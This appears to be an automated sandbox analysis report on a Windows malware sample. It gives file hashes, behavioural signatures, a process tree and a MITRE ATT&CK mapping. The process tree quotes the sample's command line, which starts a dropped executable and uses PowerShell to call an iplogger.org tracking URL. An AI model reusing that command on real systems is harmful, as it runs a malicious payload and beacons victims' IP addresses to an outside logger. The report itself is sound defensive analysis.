Analysis

  • max time kernel
    7s
  • max time network
    11s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-en-20220113
  • submitted
    05-02-2022 12:41

General

  • Target

    d23aaa6690b8141985a4237e4660246f83a59460d1fc7.exe

  • Size

    1.8MB

  • MD5

    80286211e348fb262323c664430553f2

  • SHA1

    c9a55f6c23c55d33925635fcee5fb72ad4c3f001

  • SHA256

    d23aaa6690b8141985a4237e4660246f83a59460d1fc7c614ae88eeea9d7fd4a

  • SHA512

    9cbd4b8b5622879180ea23859cd2611c093673231ba1567a2dff0198998861c68eac7cf9a830b498af121c79fe5c06aea67b7dab429af8c3e58b84d1bc42f122

Score
8/10

Malware Config

Signatures

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • HTTP links in PDF interactive object 1 IoCs

    Detects HTTP links in interactive objects within PDF files.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\d23aaa6690b8141985a4237e4660246f83a59460d1fc7.exe
    "C:\Users\Admin\AppData\Local\Temp\d23aaa6690b8141985a4237e4660246f83a59460d1fc7.exe"
    (level 1)
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:4064
    • C:\Windows\SysWOW64\cmd.exe
      "cmd" /c start "" "PRO3.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.org/1qfDf7"
      (level 2)
      • Suspicious use of WriteProcessMemory
      PID:2056
      • C:\Users\Admin\AppData\Local\Temp\PRO3.exe
        "PRO3.exe"
        (level 3)
        • Executes dropped EXE
        PID:700
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -command "Invoke-WebRequest -Uri https://iplogger.org/1qfDf7"
        (level 3)
        PID:2548

Network

MITRE ATT&CK Matrix (ATT&CK v6)

  • Discovery: System Information Discovery (T1082): 1

Downloads

    • C:\Users\Admin\AppData\Local\Temp\PRO3.exe
      MD5

      aeb230e71336c19457a6e3443fe1ef8e

      SHA1

      552884c4e035b011b01bb244679f06b6e95d4980

      SHA256

      ad1c4836f2ab049f7ed8f3dd43947d197498f92303307bdcbab2d9b52a20188a

      SHA512

      94a75af2a58d91a4c15556f51f8c132e57d29a2005140876accfe0fbaaecaef851c618e0c0f31d035eb0b0a5d8e27d0844b0e7d2278cfb3efa593badfee60914

    • C:\Users\Admin\AppData\Local\Temp\nsl4218.tmp\M17UDIQ8KE.dll
      MD5

      293165db1e46070410b4209519e67494

      SHA1

      777b96a4f74b6c34d43a4e7c7e656757d1c97f01

      SHA256

      49b7477db8dd22f8cf2d41ee2d79ce57797f02e8c7b9e799951a6c710384349a

      SHA512

      97012139f2da5868fe8731c0b0bcb3cfda29ed10c2e6e2336b504480c9cd9fb8f4728cca23f1e0bd577d75daa542e59f94d1d341f4e8aaeebc7134bf61288c19